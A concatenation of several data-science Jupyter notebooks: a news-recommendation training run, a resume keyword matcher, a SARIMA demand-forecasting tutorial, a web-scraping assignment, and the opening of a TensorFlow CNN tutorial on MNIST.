/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:526: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_quint16 = np.dtype([("quint16", np.uint16, 1)])
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:527: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_qint32 = np.dtype([("qint32", np.int32, 1)])
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:532: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
np_resource = np.dtype([("resource", np.ubyte, 1)])
###Markdown
Download and load data
###Code
data_path = tmpdir.name
yaml_file = os.path.join(data_path, r'nrms.yaml')
train_file = os.path.join(data_path, r'train.txt')
valid_file = os.path.join(data_path, r'test.txt')
wordEmb_file = os.path.join(data_path, r'embedding.npy')
if not os.path.exists(yaml_file):
download_deeprec_resources(r'https://recodatasets.blob.core.windows.net/newsrec/', data_path, 'nrms.zip')
###Output
100%|██████████| 21.2k/21.2k [00:01<00:00, 12.5kKB/s]
###Markdown
Create hyper-parameters
###Code
epochs=10
seed=42
hparams = prepare_hparams(yaml_file, wordEmb_file=wordEmb_file, epochs=epochs)
print(hparams)
iterator = NewsIterator
###Output
_____no_output_____
###Markdown
Train the NRMS model
###Code
model = NRMSModel(hparams, iterator, seed=seed)
print(model.run_eval(valid_file))
model.fit(train_file, valid_file)
res_syn = model.run_eval(valid_file)
print(res_syn)
pm.record("res_syn", res_syn)
###Output
{'group_auc': 0.5845, 'mean_mrr': 0.202, 'ndcg@5': 0.1977, 'ndcg@10': 0.2655}
|
Code/.ipynb_checkpoints/Resume - Job Description Comparator-checkpoint.ipynb | ###Markdown
Simple Job Description to Resume ComparatorThis program compares the words found in a job description to the words in a resume. The current version compares all words and gives a naive percentage match.Many employers use software to analyze applicant resumes. It is better to have as many terms in the resume that match those in the job description.
###Code
from nltk import sent_tokenize, word_tokenize, pos_tag
from nltk.corpus import stopwords
import codecs
from nltk.stem.wordnet import WordNetLemmatizer
lem = WordNetLemmatizer()
# NLTK's default english stopwords
default_stopwords = stopwords.words('english')
#File Locations
document_folder = '../data/'
resume_file = document_folder + 'resume.txt'
job_description_file = document_folder + 'job_description.txt'
custom_stopwords_file = document_folder + 'custom_stopwords.txt'
custom_stopwords = codecs.open(custom_stopwords_file, 'r', 'utf-8').read().splitlines()
all_stopwords = list(map(str.lower,set(default_stopwords + custom_stopwords)))
minimum_word_length = 2
desired_parts_of_speach = set(['NN'
,'NNP'
,'NNS'
,'NNPS']
)
def process_text(text,stopwords,pos='',lemmatizer=None):
tokens = word_tokenize(text)
tags = pos_tag(tokens)
lem = lemmatizer
if len(pos)>0:
words = [w for w,pos in tags if pos in pos]
words = [t for t in tokens if t.isalpha()]
words = [w for w in words if len(w)>=minimum_word_length]
words = [w for w in words if not w.isnumeric()]
words = [w for w in words if w not in all_stopwords]
words = [w.lower() for w in words]
if lemmatizer is not None:
words = [lem.lemmatize(w) for w in words]
# words = [nouns_only(w) for w in words]
# words = map(nouns_only, words)
return words
f_resume=open(resume_file,'r',)
f_desc = open(job_description_file,'r')
raw_resume =f_resume.read()
raw_desc = f_desc.read()
resume_words = process_text(raw_resume,all_stopwords,desired_parts_of_speach,lem)
job_words = process_text(raw_desc,all_stopwords,desired_parts_of_speach,lem)
resume_set = set(resume_words)
job_set = set(job_words)
matching_words = resume_set.intersection(job_set)
print ('You resume matches at ',"{0:.0%}".format(len(matching_words)/len(job_words)))
print('Your resume is missing the following words (naive): ',job_set-resume_set)
###Output
You resume matches at 22%
Your resume is missing the following words (naive): {'literally', 'turning', 'deep', 'absolute', 'directly', 'background', 'scientist', 'large', 'stability', 'providing', 'individual', 'user', 'behalf', 'scale', 'warehouse', 'like', 'primary', 'insight', 'knowledge', 'excellent', 'current', 'inc', 'upload', 'internal', 'seeking', 'pipeline', 'champion', 'this', 'array', 'bachelor', 'writing', 'responsibility', 'understand', 'computer', 'working', 'join', 'enables', 'degree', 'leader', 'power', 'build', 'id', 'taking', 'analyze', 'answer', 'creative', 'enhance', 'passionate', 'influence', 'identify', 'unstructured', 'job', 'our', 'engine', 'pipe', 'environment', 'highly', 'solution', 'find', 'well', 'structured', 'higher', 'presenting', 'are', 'experienced', 'question', 'play', 'news', 'matter', 'extracting', 'relevant', 'complex', 'similar', 'track', 'qualification', 'deliver', 'person', 'alexa', 'validate', 'ensure', 'music', 'description', 'best', 'tool', 'select', 'come', 'solver', 'transform', 'recognition', 'communicate', 'proficiency', 'finding', 'brain', 'name', 'extract', 'communicating', 'structure', 'excited', 'verbally', 'goal', 'record', 'information', 'manipulating', 'obsessed', 'use', 'basic', 'field', 'action', 'shaping', 'strong', 'perfect', 'ideal', 'file', 'echo', 'ownership', 'innovating', 'dsme', 'scenario', 'voice'}
|
Product Demand Forecasting/Seasonal_demand_forecast.ipynb | ###Markdown
Product Demand ForecastingThis is a Time Series Forecasting practice with ARIMA. The goal here is to use historical product data to forecast the demand in the future.Reference: https://www.kaggle.com/kashdotten/forecast-order-demand-seasonalarima
###Code
import itertools
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import rcParams
%matplotlib inline
from scipy.stats import norm, skew
from scipy import stats #qqplot
import statsmodels.api as sm #for decomposing the trends, seasonality etc.
from statsmodels.tsa.statespace.sarimax import SARIMAX
###Output
_____no_output_____
###Markdown
1. Load data and cleaningLet's load the data file and check the shape and types of data we have.
###Code
df = pd.read_csv('Historical-Product-Demand.csv', parse_dates=['Date'])
df.head()
df.shape
df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1048575 entries, 0 to 1048574
Data columns (total 5 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Product_Code 1048575 non-null object
1 Warehouse 1048575 non-null object
2 Product_Category 1048575 non-null object
3 Date 1037336 non-null datetime64[ns]
4 Order_Demand 1048575 non-null object
dtypes: datetime64[ns](1), object(4)
memory usage: 40.0+ MB
###Markdown
Check for NaN values. Only 1 column has NaN values, and they account for only 1% of the data. It is safe to drop these.
###Code
# Check any number of columns with NaN
print(df.isnull().any().sum(), '/', len(df.columns))
# Check any number of data points with NaN
print(df.isnull().any(axis=1).sum(), '/', len(df))
df.dropna(axis=0, inplace=True)
df.reset_index(drop=True)
df.sort_values('Date')
df['Order_Demand'] = df['Order_Demand'].str.strip('()')
df['Order_Demand'] = df['Order_Demand'].astype('int64')
#Get the lowest and highest dates in the dataset.
df['Date'].min() , df['Date'].max()
#Lets start with 2012 and cap it 2016 december. Since the dates before 2012 have a lot of missing values - inspected and checked using basic time series plot.
df = df[(df['Date']>='2012-01-01') & (df['Date']<='2016-12-31')].sort_values('Date', ascending=True)
###Output
_____no_output_____
###Markdown
2. Exploratory Data AnalysisWe first explore the features individually, starting with warehouse. Here we sort the warehouses by shipment counts.
###Code
df['Warehouse'].value_counts().sort_values(ascending = False)
###Output
_____no_output_____
###Markdown
Here we sort the warehouses by sum of orders. Warehouse J ships the most orders, while warehouse S ships more orders in fewer shipments.
###Code
df.groupby('Warehouse').sum().sort_values('Order_Demand', ascending = False)
###Output
_____no_output_____
###Markdown
We then look at the product category feature. There are 33 categories. From the count plot, category 19 has the most orders.
###Code
print(df['Product_Category'].unique())
print(len(df['Product_Category'].unique()))
rcParams['figure.figsize'] = 50,14
sns.countplot(df['Product_Category'].sort_values(ascending = True))
###Output
_____no_output_____
###Markdown
Now let's see how these features interact with the order demand. Again, we start with the warehouse feature.
###Code
sns.boxplot(df['Warehouse'],df['Order_Demand'])
###Output
_____no_output_____
###Markdown
Where are the boxes? Let's apply a log transformation to the order demand feature.
###Code
sns.boxplot(df['Warehouse'], np.log1p(df['Order_Demand']))
###Output
_____no_output_____
###Markdown
Now with product category, we sample a subset of data to deal with the memory issue. Again, we apply a log transformation to the order demand feature.
###Code
rcParams['figure.figsize'] = 50,12
df_temp = df.sample(n=20000).reset_index()
fig5 = sns.boxplot( df_temp['Product_Category'].sort_values(),np.log1p(df_temp['Order_Demand']))
###Output
_____no_output_____
###Markdown
3. Time series analysisWe can first sum the total order demand for each day.
###Code
df = df.groupby('Date')['Order_Demand'].sum().reset_index()
df.head()
###Output
_____no_output_____
###Markdown
We use the date as index here for resampling later.
###Code
df = df.set_index('Date')
df.index
###Output
_____no_output_____
###Markdown
Let's average daily order demand for each month.
###Code
y = df['Order_Demand'].resample('MS').mean()
y.plot(figsize=(12,5))
plt.show()
###Output
_____no_output_____
###Markdown
We can use statsmodels' time series analysis library to decompose our data into additive components. 4 plots are shown below, with the top one being the original time series. The data is decomposed into 3 components here: Trend, seasonal, and residual.
###Code
rcParams['figure.figsize'] = 18, 8
decomposition = sm.tsa.seasonal_decompose(y, model='additive')
fig = decomposition.plot()
plt.show()
###Output
_____no_output_____
###Markdown
SARIMA: Seasonal Autoregressive Integrated Moving Average.\The terms are AR: autoregression. I: differencing. MA: moving average.12 is for monthly data.More information can be found in this quick start [tutorial](https://machinelearningmastery.com/sarima-for-time-series-forecasting-in-python/) and gridsearch SARIMA [tutorial](https://machinelearningmastery.com/how-to-grid-search-sarima-model-hyperparameters-for-time-series-forecasting-in-python/).Documentation [here](https://www.statsmodels.org/stable/generated/statsmodels.tsa.statespace.sarimax.SARIMAX.htmlstatsmodels.tsa.statespace.sarimax.SARIMAX).
###Code
p = d = q = range(0, 2)
pdq = list(itertools.product(p, d, q))
seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]
print('Examples of parameter combinations for Seasonal ARIMA...')
print('SARIMAX: {} x {}'.format(pdq[1], seasonal_pdq[1]))
print('SARIMAX: {} x {}'.format(pdq[1], seasonal_pdq[2]))
print('SARIMAX: {} x {}'.format(pdq[2], seasonal_pdq[3]))
print('SARIMAX: {} x {}'.format(pdq[2], seasonal_pdq[4]))
###Output
Examples of parameter combinations for Seasonal ARIMA...
SARIMAX: (0, 0, 1) x (0, 0, 1, 12)
SARIMAX: (0, 0, 1) x (0, 1, 0, 12)
SARIMAX: (0, 1, 0) x (0, 1, 1, 12)
SARIMAX: (0, 1, 0) x (1, 0, 0, 12)
###Markdown
Below is a manual gridsearch over the parameters for seasonal arima. The Akaike information criterion (AIC) is an estimator of the relative quality of statistical models for a given set of data. AIC measures how well a model fits the data while taking into account the overall complexity of the model. Large AIC: Model fits very well using a lot of features. Small AIC: Model fits similar fit but using lesser features. Hence the lower the AIC, the better it is.
###Code
#The code tests the given params using sarimax and outputs the AIC scores.
for param in pdq:
for param_seasonal in seasonal_pdq:
try:
mod = sm.tsa.statespace.SARIMAX(y,
order=param,
seasonal_order=param_seasonal,
enforce_stationarity=False,
enforce_invertibility=False)
results = mod.fit()
print('SARIMA{}x{}12 - AIC:{}'.format(param, param_seasonal, results.aic))
except:
continue
###Output
SARIMA(0, 0, 0)x(0, 0, 0, 12)12 - AIC:1932.23655778549
SARIMA(0, 0, 0)x(0, 0, 1, 12)12 - AIC:1512.927583212436
SARIMA(0, 0, 0)x(0, 1, 0, 12)12 - AIC:1338.8201294951011
SARIMA(0, 0, 0)x(0, 1, 1, 12)12 - AIC:3023.482324073208
SARIMA(0, 0, 0)x(1, 0, 0, 12)12 - AIC:1366.5117513512635
SARIMA(0, 0, 0)x(1, 0, 1, 12)12 - AIC:1340.8450308457734
SARIMA(0, 0, 0)x(1, 1, 0, 12)12 - AIC:1023.6756022859485
SARIMA(0, 0, 0)x(1, 1, 1, 12)12 - AIC:3064.958350052849
SARIMA(0, 0, 1)x(0, 0, 0, 12)12 - AIC:1862.087487804522
SARIMA(0, 0, 1)x(0, 0, 1, 12)12 - AIC:1471.1838032700691
SARIMA(0, 0, 1)x(0, 1, 0, 12)12 - AIC:1305.3289813345486
SARIMA(0, 0, 1)x(0, 1, 1, 12)12 - AIC:2942.2244097097573
SARIMA(0, 0, 1)x(1, 0, 0, 12)12 - AIC:1529.1005721650718
SARIMA(0, 0, 1)x(1, 0, 1, 12)12 - AIC:1467.6395590277853
SARIMA(0, 0, 1)x(1, 1, 0, 12)12 - AIC:1020.6347629759119
SARIMA(0, 0, 1)x(1, 1, 1, 12)12 - AIC:3009.0925627524493
SARIMA(0, 1, 0)x(0, 0, 0, 12)12 - AIC:1648.7378898187837
SARIMA(0, 1, 0)x(0, 0, 1, 12)12 - AIC:1309.8653292101988
SARIMA(0, 1, 0)x(0, 1, 0, 12)12 - AIC:1318.7588141990293
SARIMA(0, 1, 0)x(0, 1, 1, 12)12 - AIC:2962.7208822328053
SARIMA(0, 1, 0)x(1, 0, 0, 12)12 - AIC:1331.924340756696
SARIMA(0, 1, 0)x(1, 0, 1, 12)12 - AIC:1315.7243994326866
SARIMA(0, 1, 0)x(1, 1, 0, 12)12 - AIC:998.700939745945
SARIMA(0, 1, 0)x(1, 1, 1, 12)12 - AIC:2821.242692855516
SARIMA(0, 1, 1)x(0, 0, 0, 12)12 - AIC:1590.336917752371
SARIMA(0, 1, 1)x(0, 0, 1, 12)12 - AIC:1258.4897692522463
SARIMA(0, 1, 1)x(0, 1, 0, 12)12 - AIC:1272.6101180952069
SARIMA(0, 1, 1)x(0, 1, 1, 12)12 - AIC:2874.329382437139
SARIMA(0, 1, 1)x(1, 0, 0, 12)12 - AIC:1312.2056245504862
SARIMA(0, 1, 1)x(1, 0, 1, 12)12 - AIC:1257.3483691459887
SARIMA(0, 1, 1)x(1, 1, 0, 12)12 - AIC:989.7075794133763
SARIMA(0, 1, 1)x(1, 1, 1, 12)12 - AIC:2737.840668378898
SARIMA(1, 0, 0)x(0, 0, 0, 12)12 - AIC:1680.3876682174587
SARIMA(1, 0, 0)x(0, 0, 1, 12)12 - AIC:1337.118044296482
SARIMA(1, 0, 0)x(0, 1, 0, 12)12 - AIC:1332.0586593038347
SARIMA(1, 0, 0)x(0, 1, 1, 12)12 - AIC:3025.2236284647324
SARIMA(1, 0, 0)x(1, 0, 0, 12)12 - AIC:1334.1893088021352
SARIMA(1, 0, 0)x(1, 0, 1, 12)12 - AIC:1335.3199395698064
SARIMA(1, 0, 0)x(1, 1, 0, 12)12 - AIC:990.0724002186286
SARIMA(1, 0, 0)x(1, 1, 1, 12)12 - AIC:3093.9996683616214
SARIMA(1, 0, 1)x(0, 0, 0, 12)12 - AIC:1621.1081438130254
SARIMA(1, 0, 1)x(0, 0, 1, 12)12 - AIC:1287.3358941928989
SARIMA(1, 0, 1)x(0, 1, 0, 12)12 - AIC:1302.1688057383137
SARIMA(1, 0, 1)x(0, 1, 1, 12)12 - AIC:2935.6645809631004
SARIMA(1, 0, 1)x(1, 0, 0, 12)12 - AIC:1339.1695079810452
SARIMA(1, 0, 1)x(1, 0, 1, 12)12 - AIC:1288.2892745671836
SARIMA(1, 0, 1)x(1, 1, 0, 12)12 - AIC:987.780252041274
SARIMA(1, 0, 1)x(1, 1, 1, 12)12 - AIC:3002.5327340057925
SARIMA(1, 1, 0)x(0, 0, 0, 12)12 - AIC:1636.5498182934678
SARIMA(1, 1, 0)x(0, 0, 1, 12)12 - AIC:1297.9161854329018
SARIMA(1, 1, 0)x(0, 1, 0, 12)12 - AIC:1309.6529019605618
SARIMA(1, 1, 0)x(0, 1, 1, 12)12 - AIC:2968.048279238306
SARIMA(1, 1, 0)x(1, 0, 0, 12)12 - AIC:1295.0340856103091
SARIMA(1, 1, 0)x(1, 0, 1, 12)12 - AIC:1296.3640593636949
SARIMA(1, 1, 0)x(1, 1, 0, 12)12 - AIC:963.4491531777289
SARIMA(1, 1, 0)x(1, 1, 1, 12)12 - AIC:2827.36293748133
SARIMA(1, 1, 1)x(0, 0, 0, 12)12 - AIC:1592.0766231790378
SARIMA(1, 1, 1)x(0, 0, 1, 12)12 - AIC:1260.0654223247143
SARIMA(1, 1, 1)x(0, 1, 0, 12)12 - AIC:1274.0946916151815
SARIMA(1, 1, 1)x(0, 1, 1, 12)12 - AIC:2876.326516434194
SARIMA(1, 1, 1)x(1, 0, 0, 12)12 - AIC:1285.44377400188
SARIMA(1, 1, 1)x(1, 0, 1, 12)12 - AIC:1259.178188415773
SARIMA(1, 1, 1)x(1, 1, 0, 12)12 - AIC:960.5164122018635
SARIMA(1, 1, 1)x(1, 1, 1, 12)12 - AIC:2739.8378023759533
###Markdown
The next iteration of this method would involve using a pre-built gridsearch pipeline like the one in scikit-learn.\The best parameters from this round are found to be:\ARIMA(1, 1, 1)x(1, 1, 0, 12)12 - AIC:960.56We use these parameters in SARIMA.
###Code
mod = sm.tsa.statespace.SARIMAX(y,
order=(1, 1, 1),
seasonal_order=(1, 1, 0, 12),
enforce_stationarity=False,
enforce_invertibility=False)
results = mod.fit()
print(results.summary().tables[1])
###Output
==============================================================================
coef std err z P>|z| [0.025 0.975]
------------------------------------------------------------------------------
ar.L1 -0.2450 0.368 -0.666 0.505 -0.966 0.476
ma.L1 -0.4385 0.325 -1.348 0.178 -1.076 0.199
ar.S.L12 -0.4568 0.208 -2.192 0.028 -0.865 -0.048
sigma2 1.018e+11 9.55e-13 1.06e+23 0.000 1.02e+11 1.02e+11
==============================================================================
###Markdown
Let's plot the diagnostics.What should we expect?1. The residuals should be normally distributed. Top right: the orange KDE line should closely match the green N(0,1) (normal distribution with zero mean and unit variance) line. Bottom left: the qq plot shows the ordered distribution of residuals which follows the linear trend of samples taken from N(0,1).2. The residuals are not correlated. Top left: the standardized residuals do not display seasonality and appear to be noise. Bottom right: the autocorrelation (correlogram) plot shows that the time series residuals have low correlation with irs own lagged versions.
###Code
results.plot_diagnostics(figsize=(16, 8))
plt.show()
###Output
_____no_output_____
###Markdown
4. ValidationWe can use a subset of the data to validate our time series model. Here we can choose the data starting from April 2015. Here we see the prediction seems to fit well with the observed data. The confidence interval defaults to 95%.
###Code
pred = results.get_prediction(start=pd.to_datetime('2015-04-01'), dynamic=False) #false is when using the entire history.
pred_ci = pred.conf_int()
ax = y['2013':].plot(label='observed')
pred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))
ax.fill_between(pred_ci.index,
pred_ci.iloc[:, 0],
pred_ci.iloc[:, 1], color='blue', alpha=.2)
ax.set_xlabel('Date')
ax.set_ylabel('Order_Demand')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
5. ForecastingNow we would like to forecast order demands for the next 50 months. As expected, the further ahead in time, the more variance is expected from the prediction.
###Code
pred_uc = results.get_forecast(steps=50)
pred_ci = pred_uc.conf_int()
ax = y.plot(label='observed', figsize=(14, 7), linewidth=3)
pred_uc.predicted_mean.plot(ax=ax, label='Forecast', linewidth=3)
ax.fill_between(pred_ci.index,
pred_ci.iloc[:, 0],
pred_ci.iloc[:, 1], color='k', alpha=.2)
ax.set_xlabel('Date')
ax.set_ylabel('Order Demand')
plt.legend()
plt.show()
###Output
_____no_output_____ |
_notebooks/2022-03-04- Assingment5.ipynb | ###Markdown
"Assignment 9"> "This is an assignment from week 5 that looks at web scraping data from the corgis website while I explore multiple datasets."- toc:true- branch: master- badges: true- comments: true- author: Michael Iniquez- categories: [fastpages, jupyter] Assignment 5: Web Scraping
###Code
import pandas as pd
import requests
Response = requests.get("https://corgis-edu.github.io/corgis/csv/")
Response
#collapse-output
Response.text
#hide
print(Response.text)
from bs4 import BeautifulSoup
html_string = Response.text
document = BeautifulSoup(html_string, "html.parser")
corgis_list = []
for i in document.find_all("h3"):
corgis_list.append(i.text.strip())
#collapse-output
corgis_list
#collapse-output
document.find_all("h3")
#collapse-output
document()
def pdcorgis(x):
#x = "Covid"
x.lower()
Response = requests.get("https://corgis-edu.github.io/corgis/csv/" + x + '/')
html_string = Response.text
document = BeautifulSoup(html_string, "html.parser")
#global corgisdf
for i in document.find_all("a"):
if (i.has_attr('download')) == 1:
print(i['href'])
corgisdf = pd.read_csv("https://corgis-edu.github.io/corgis/csv/" + x + '/' + i['href'])
return corgisdf
###Output
_____no_output_____
###Markdown
Looking at Major and Avg. Income
###Code
pdcorgis('graduates')
grad_df = pdcorgis('graduates')
grad_df.head()
#collapse-output
grad_df.dtypes
a = grad_df.loc[:10].plot(kind = 'barh', x = 'Education.Major', y = 'Salaries.Median')
a.set_title('First 10 data values and their Median Salary')
###Output
_____no_output_____
###Markdown
This initial examiniation of the data set shows the stem makes the most in terms of median salary. I would aggregate the data so that all Chemistry majors are in 1 variable and I would do the same for each of other variable. I believe that would work and makes sense. Exploring Billionaires dataset
###Code
pdcorgis('billionaires')
bill_df = pdcorgis('billionaires')
bill_df.head()
#collapse-output
bill_df.dtypes
bill_df.sort_values('year')
a = bill_df.loc[:25].plot(kind = 'barh', x = 'company.sector', y = 'rank')
a.set_title("The first 25 values displaying the rank of certain Sectors")
###Output
_____no_output_____
###Markdown
This is important to examine as not every software company ranks as number one. Although the first 3 are software, we see software again somewhere ranking at 5. Nevertheless, it is important to note that in this inital examination of this dataset, software is the wealthiest sector. Looking at Election Data
###Code
pdcorgis("election")
df = pdcorgis("election")
df.iloc[:50].plot(kind = "bar", x = 'Location.State' , y = 'Vote Data.Bernie Sanders.Number of Votes')
figsize=(12,6)
###Output
_____no_output_____ |
4_tensorflow_cnn.ipynb | ###Markdown
TensorFlow Tutorial - CNNsIn this tutorial, you will learn how to build a convolutional neural network (CNN) for image classification. We will be working with the well-known MNIST dataset featuring hand-written single digits. The CNNs task is then to identify which digit is shown on a given image.The tutorial is based on the official [TensorFlow example](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/tutorials/mnist/mnist_with_summaries.py). It is meant to teach you the basic tools needed to implement a convolutional architecture in TensorFlow and it additionally shows how to leverage TensorBoard for some visualizations.In the following, we assume familiarity with the TensorFlow tutorial presented in the previous exercise, i.e., you should be aware of TensorFlow's core concepts, such as graph, session, input placeholders, etc.This tutorial consists of: 1. Introduction to CNNs 2. The MNIST Data Set 3. Building the Model 4. TensorBoard 5. Concluding Remarks and Exercises Introduction to CNNs The Convolution OperationA convolution is a mathematical operation and represents an essential building block in image processing tasks. Depending on what filter you use to convolve an image with, you can use convolutions to blur an image (i.e., removing high-frequency noise) ...... detect edges ...... and [many other things](http://setosa.io/ev/image-kernels/). You can think of a convolution as sliding a window, also called _kernel_ or _filter_, over each pixel of an image and computing a dot product between the filter's values and the image's values that the filter is covering. This operation produces one output value for every location on the image over which we slide the filter. Usually, we go through every pixel in the image and position the filter such that its center pixel lies on the image pixel. Hence, for pixels lying on the boundary of the image, we have to pad the image as the filter otherwise "spills over" (more on this later). A visualization of the convolution process looks like this (this and subsequent animations taken from [here](https://github.com/vdumoulin/conv_arithmetic)):Here, blue is the input image, grey is the 3-by-3 filter that we are convolving the input image with and green is the output image. The dashed pixels represent padded regions. Convolutions in Neural NetworksIn the context of CNNs, we are using exactly the same convolution operation, but we think of it in a slightly different way: Instead of producing a desired output image like in traditional image processing tasks (e.g. blurry, edges highlighted, etc.), a filter extracts certain _features_ from a local neighborhood and we store them in _feature maps_, sometimes also called _activation maps_ or simply _channels_. Moreover, we are moving several filters over a given image, so each convolutional layer potentially outputs several of those feature maps. Importantly, the weights of the filter are not fixed - those values are actually what the network must optimize. In other words, the network learns to set up those filters in such a way that they extract features from the images that are most useful for the network to solve the task at hand.The following animation taken from the lecture slides summarizes all this: Types of ConvolutionsWhen adding a convolutional layer, we must decide upon the following: - **Filter Size**: We have to decide how big a filter is, i.e. determine its width and height. Common choices are small, square, and odd, e.g. 3-by-3, 5-by-5, 7-by-7, etc. Of course, this depends on the problem you are trying to solve. Increasing the filter sizes increases the amount of trainable parameters. CNNs are every effective models thanks to **weight-sharing** and **repetition of convolution operation**, which also provides invariance to certain image operations such as translation and rotation. The parameter space can be reduced considerably in comparison to fully connected layers. Choosing huge filter sizes goes against this intuition, and in recent research it was shown, that instead of increasing filter sizes, creating deeper models is generally a better idea. - **Number of Feature Maps**: We should also decide how many feature maps each layer outputs. Again, this design choice depends on the problem. - **Padding**: As mentioned above, when we apply the filter on the boundary of the image, the filter "spills over". Hence, we must decide what to do in these cases. TensorFlow knows two options: _VALID_ or _SAME_. When we choose _VALID_ the filter will only be placed on pixels where it does not "spill over" the boundary. This means, that the output image will _not_ have the same size as the input image. On the other hand _SAME_ applies just enough padding that the output image will be the same size as the input (if the stride is 1). - **Strides**: So far we always assumed that once we computed the output of a filter at a given location, we just move on the pixel right next to it. We could however also choose to omit some pixels inbetween. E.g., if we were to compute the convolution only on every other pixel, we would say that we use a stride of 2. This effectively reduces the size of the output image. Sometimes strided convolutions are used instead of pooling layers. The following example shows a convolution with the stride set to 2 on both the vertical and the horizontal axis of the image. - **Dilations**: In dilated convolutions, sometimes also called "à trous", we introduce holes in the filter, i.e. we spread the filter over a wider area but without considering some pixels inside that area in the computation of the dot product. This allows for a **faster growth of the receptive field** in deeper layers than with standard convolutions. The intuition behind is that it is easier to integrate global context into the convolution operation. The following example shows a dilated convolution with a dilation factor of 2 on both the vertical and horizontal axis of the image. Building Blocks of a CNNCNNs built for classification tasks typically make use the following types of layers: - **Convolutional Layers**: Layers implementing the actual convolution as explained above. Their outputs are feature maps which are then passed through an activation function in order to introduce non-linearities into the system. Convolutional layers can be seen as extracting features that are passed on deeper into the model thus enabling the model to learn higher-level features that maket he classification task easier. - **Pooling Layers**: Downsampling or pooling layers concentrate the information so that deeper layers focus more on abstract/high-level patterns. You can apply strided convolutions to apply downsampling. A decreased image size also speeds up the processing time in general because less convolutions are necessary on subsequent layers. Furthermore, pooling allows for some translation invariance on the input. A common choice is max-pooling, where only the maximum value occurring in a certain region is propagated to the output. - **Dense Layers**: A dense or fully-connected layer connects every node in the input to every node in the output. This is the type of layer you already used for the linear regression model in the previous tutorial. If the input dimension is large, the amount of learnable parameters introduced by using a dense layer can quickly explode. Hence, dense layers are usually added on deeper levels of the model, where the pooling operations have already reduced the dimensionality of the data. Typically, the dense layers are added last in a classification model, performing the actual classification on the features extracted by the convolutional layers. As an example, here is the architecture overview of the VGG16 model ([source](https://www.safaribooksonline.com/library/view/machine-learning-with/9781786462961/21266fa5-9e3b-4f9e-b3c6-2ca27a8f8c12.xhtml)). The MNIST Data SetWith this brief recap of convolutional architectures, we are now ready to tackle the problem of hand-written digit classification from images. Let's first have a look at the contents of the MNIST data set. To do so, let's import all the libraries we need for this tutorial and define some useful helper functions.
###Code
%tensorflow_version 1.x
import tensorflow as tf
from tensorflow.python.util import deprecation
deprecation._PRINT_DEPRECATION_WARNINGS = False
import numpy as np
import matplotlib.pyplot as plt
import math
import os
from tensorflow.examples.tutorials.mnist import input_data
# Tensorboard in Colab environment.
!pip install tensorboardcolab
from tensorboardcolab import *
tbc = TensorBoardColab()
# Visit the URL below after Tensorboard section.
def plot_images(images, cls_true, cls_pred=None):
"""Plot 9 MNIST sample images in a 3x3 sub-plot."""
assert len(images) == len(cls_true) == 9
# Create figure with 3x3 sub-plots.
fig, axes = plt.subplots(3, 3)
fig.subplots_adjust(hspace=0.3, wspace=0.3)
for i,ax in enumerate(axes.flat):
# Plot image.
ax.imshow(images[i].reshape(img_shape), cmap='binary')
# Show true and predicted classes.
if cls_pred is None:
xlabel = "True: {0}".format(cls_true[i])
else:
xlabel = "True: {0}, Pred: {1}".format(cls_true[i], cls_pred[i])
ax.set_xlabel(xlabel)
# Remove ticks
ax.set_xticks([])
ax.set_yticks([])
# Import the data
log_dir = "/tmp/tensorflow/mnist_cnn/logs"
mnist = input_data.read_data_sets(log_dir, one_hot=False, fake_data=False)
# We know that MNIST images are 28 pixels in each dimension.
img_size = 28
# Images are stored in one-dimensional arrays of this length.
img_size_flat = img_size * img_size
# Tuple with height and width of images used to reshape arrays.
img_shape = (img_size, img_size)
# Images are gray-scale, so we only have one image channel
num_image_channels = 1
# Number of classes, one class for each of 10 digits.
num_classes = 10
# Print some stats
print("Size of:")
print("- Training-set:\t\t{}".format(len(mnist.train.labels)))
print("- Test-set:\t\t{}".format(len(mnist.test.labels)))
print("- Validation-set:\t{}".format(len(mnist.validation.labels)))
# Get some sample images from the test set.
images = mnist.test.images[0:9]
# Get the true classes for those images.
cls_true = mnist.test.labels[0:9]
# Plot the images and labels using our helper-function above.
plot_images(images=images, cls_true=cls_true)
###Output
Successfully downloaded train-images-idx3-ubyte.gz 9912422 bytes.
Extracting /tmp/tensorflow/mnist_cnn/logs/train-images-idx3-ubyte.gz
Successfully downloaded train-labels-idx1-ubyte.gz 28881 bytes.
Extracting /tmp/tensorflow/mnist_cnn/logs/train-labels-idx1-ubyte.gz
Successfully downloaded t10k-images-idx3-ubyte.gz 1648877 bytes.
Extracting /tmp/tensorflow/mnist_cnn/logs/t10k-images-idx3-ubyte.gz
Successfully downloaded t10k-labels-idx1-ubyte.gz 4542 bytes.
Extracting /tmp/tensorflow/mnist_cnn/logs/t10k-labels-idx1-ubyte.gz
Size of:
- Training-set: 55000
- Test-set: 10000
- Validation-set: 5000
###Markdown
Building the ModelLet's now have a look at the core of this tutorial, namely how to build the actual CNN that is trained to predict the hand-written number on 28-by-28 gray-scale images. To begin with, when you build a model there are usually some design choices and hyper-parameters that you want to experiment with. Hence, it is good practice to make those parameters configurable through the command line or an external configuration file. TensorFlow provides built-in support for this, called `FLAGS`, so let's define some of those:
###Code
def del_all_flags(FLAGS):
flags_dict = FLAGS._flags()
keys_list = [keys for keys in flags_dict]
for keys in keys_list:
FLAGS.__delattr__(keys)
del_all_flags(tf.flags.FLAGS)
tf.app.flags.DEFINE_string("log_dir", log_dir, "Summaries log directory")
tf.app.flags.DEFINE_string("feature_map_sizes", "32,64,128", "Number of layers to be used and number of feature maps per layer")
